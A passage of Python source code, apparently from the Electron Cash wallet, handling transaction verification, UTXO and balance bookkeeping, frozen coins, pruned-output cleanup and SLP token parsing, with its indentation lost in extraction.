txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_height(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
assert isinstance(address, Address)
"effect of tx on address"
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_slp_token_info(self, tokenid):
with self.lock:
return self.tx_tokinfo[tokenid]
def get_slp_token_baton(self, slpTokenId, cache=True):
with self.lock:
slp_txos = copy.deepcopy(self._slp_txo)
# look for a minting baton
for addr, addrdict in slp_txos.items():
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if txo['qty'] == 'MINT_BATON' and txo['token_id'] == slpTokenId:
try:
coins = self.get_slp_utxos(slpTokenId, domain = [addr], exclude_frozen = False, confirmed_only = False, slp_include_baton=True)
with self.lock:
val = self.tx_tokinfo[txid]['validity']
baton_utxo = [ utxo for utxo in coins if utxo['prevout_hash'] == txid and utxo['prevout_n'] == idx and val == 1][0]
except IndexError:
continue
return baton_utxo
raise SlpNoMintingBatonFound()
# This method is updated for SLP to prevent tokens from being spent
# in normal txn or txns with token_id other than the one specified
def get_addr_utxo(self, address, *, exclude_slp = True):
coins, spent = self.get_addr_io(address)
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
"""
SLP -- removes ALL SLP UTXOs that are either unrelated, or unvalidated
"""
if exclude_slp:
with self.lock:
addrdict = self._slp_txo.get(address,{})
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
coins.pop(txid + ":" + str(idx), None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp
}
out[txo] = x
return out
""" SLP -- keeps ONLY SLP UTXOs that are either unrelated, or unvalidated """
def get_slp_addr_utxo(self, address, slpTokenId, slp_include_invalid=False, slp_include_baton=False, ):
with self.lock:
coins, spent = self.get_addr_io(address)
addrdict = copy.deepcopy(self._slp_txo.get(address,{}))
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
coins_to_pop = []
for coin in coins.items():
if coin != None:
txid = coin[0].split(":")[0]
idx = coin[0].split(":")[1]
try:
slp_txo = addrdict[txid][int(idx)]
with self.lock:
slp_tx_info = self.tx_tokinfo[txid]
# handle special burning modes
if slp_txo['token_id'] == slpTokenId:
# allow inclusion and possible burning of a valid minting baton
if slp_include_baton and slp_txo['qty'] == "MINT_BATON" and slp_tx_info['validity'] == 1:
continue
# allow inclusion and possible burning of invalid SLP txos
if slp_include_invalid and slp_tx_info['validity'] != 0:
continue
# normal remove any txos that are not valid for this token ID
if slp_txo['token_id'] != slpTokenId or slp_tx_info['validity'] != 1 or slp_txo['qty'] == "MINT_BATON":
coins_to_pop.append(coin[0])
except KeyError:
coins_to_pop.append(coin[0])
for c in coins_to_pop:
coins.pop(c, None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
with self.lock:
tok_info = self.tx_tokinfo[prevout_hash]
x = {
'address': address,
'value': value,
'prevout_n': int(prevout_n),
'prevout_hash': prevout_hash,
'height': tx_height,
'coinbase': is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'token_value': addrdict[prevout_hash][int(prevout_n)]['qty'],
'token_id_hex': tok_info['token_id'],
'token_type': tok_info['type'],
'token_validation_state': tok_info['validity']
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
# if (isInvoice):
# confirmed_only = True
return self.get_utxos(domain=domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only)
def get_slp_spendable_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=True, confirmed_only=confirmed_only)
def get_slp_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=False, confirmed_only=confirmed_only)
def get_slp_token_balance(self, slpTokenId, config):
valid_token_bal = 0
unvalidated_token_bal = 0
invalid_token_bal = 0
unfrozen_valid_token_bal = 0
slp_coins = self.get_slp_coins(slpTokenId, None, config)
for coin in slp_coins:
txid = coin['prevout_hash']
validity = self.tx_tokinfo[txid]['validity']
if validity == 1: # Valid DAG
valid_token_bal += coin['token_value']
if not coin['is_frozen_coin'] and coin['address'] not in self.frozen_addresses:
unfrozen_valid_token_bal += coin['token_value']
elif validity > 1: # Invalid DAG (2=bad slpmessage, 3=inputs lack enough tokens / missing mint baton, 4=change token_type or bad NFT parent)
invalid_token_bal += coin['token_value']
elif validity == 0: # Unknown DAG status (should be in processing queue)
unvalidated_token_bal += coin['token_value']
return (valid_token_bal, unvalidated_token_bal, invalid_token_bal, unfrozen_valid_token_bal, valid_token_bal - unfrozen_valid_token_bal)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr, exclude_slp=exclude_slp)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def get_slp_utxos(self, slpTokenId, domain = None, exclude_frozen = False, confirmed_only = False, slp_include_invalid=False, slp_include_baton=False,
*, addr_set_out = None):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_slp_addr_utxo(addr, slpTokenId, slp_include_invalid=slp_include_invalid, slp_include_baton=slp_include_baton)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
coins.append(x)
continue
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_slp_locked_balance(self):
bch = 0
with self.lock:
for addr, addrdict in self._slp_txo.items():
_, spent = self.get_addr_io(addr)
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if (txid + ":" + str(idx)) in spent:
continue
try:
for i, a, _ in self.txo[txid][addr]:
if i == idx:
bch+=a
except KeyError:
pass
return bch
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
### SLP: Handle incoming SLP transaction outputs here
self.handleSlpTransaction(tx_hash, tx)
"""
Callers are expected to take lock(s). We take no locks
"""
def handleSlpTransaction(self, tx_hash, tx):
txouts = tx.outputs()
try:
slpMsg = SlpMessage.parseSlpOutputScript(txouts[0][1])
except SlpUnsupportedSlpTokenType as e:
token_type = 'SLP%d'%(e.args[0],)
for i, (_type, addr, _) in enumerate(txouts):
if _type == TYPE_ADDRESS and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': token_type,
'qty': None,
'token_id': None,
}
return
except (SlpParsingError, IndexError, OpreturnError):
return
if slpMsg.transaction_type == 'SEND':
token_id_hex = slpMsg.op_return_fields['token_id_hex']
# truncate outputs list
amounts = slpMsg.op_return_fields['token_output'][:len(txouts)]
for i, qty in enumerate(amounts):
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS and qty > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': qty,
}
elif slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx_hash
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['initial_token_mint_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['initial_token_mint_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == "MINT":
token_id_hex = slpMsg.op_return_fields['token_id_hex']
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['additional_token_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['additional_token_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == 'COMMIT':
# ignore COMMs, they aren't producing any tokens.
return
else:
raise RuntimeError(slpMsg.transaction_type)
# On receiving a new SEND, MINT, or GENESIS always add entry to token_types if wallet hasn't seen tokenId yet
if slpMsg.transaction_type in [ 'SEND', 'MINT', 'GENESIS' ]:
if slpMsg.transaction_type == 'GENESIS':
tokenid = tx_hash
else:
tokenid = slpMsg.op_return_fields['token_id_hex']
new_token = True
for k, v in self.tx_tokinfo.items():
try:
if v['token_id'] == tokenid:
new_token = False
except KeyError:
pass
if new_token and tokenid not in self.token_types:
tty = { 'class': 'SLP%d'%(slpMsg.token_type,),
'decimals': "?",
'name': 'unknown-' + tokenid[:6]
}
if slpMsg.token_type == 65:
tty['group_id'] = "?"
self.token_types[tokenid] = tty
# Always add entry to tx_tokinfo
tti = { 'type':'SLP%d'%(slpMsg.token_type,),
'transaction_type':slpMsg.transaction_type,
'token_id': token_id_hex,
'validity': 0,
}
self.tx_tokinfo[tx_hash] = tti
if self.is_slp: # Only start up validation if SLP enabled
self.slp_check_validation(tx_hash, tx)
